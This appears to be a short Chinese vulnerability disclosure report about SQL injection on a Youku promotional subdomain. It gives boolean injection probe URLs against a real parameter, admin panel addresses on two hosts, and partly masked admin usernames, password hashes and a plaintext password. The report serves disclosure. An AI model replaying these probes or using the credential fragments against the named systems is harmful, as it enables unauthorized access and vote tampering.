简要描述:
通过sql注入获得后台密码,登录后可以进行视频审核操作、投票数修改操作(有作弊嫌疑哦~~)。
有截图(wooyun目前不支持)
详细说明:
http://sww.youku.com/lists.php?tag=whhyn and 1=1
http://sww.youku.com/lists.php?tag=whhyn and 1=2
http://sww.youku.com/admin/main.php
http://minisite.youku.com/admin/main.php
漏洞证明:
用户、密码信息:
youku_***|1c63129ae9db9c60c3e8aa94d3e00***
youku_sp***|1c63129ae9db9c60c3e8aa94d3e00***
1q***wsx
*为马赛克
修复方案:
过滤用户提交内容。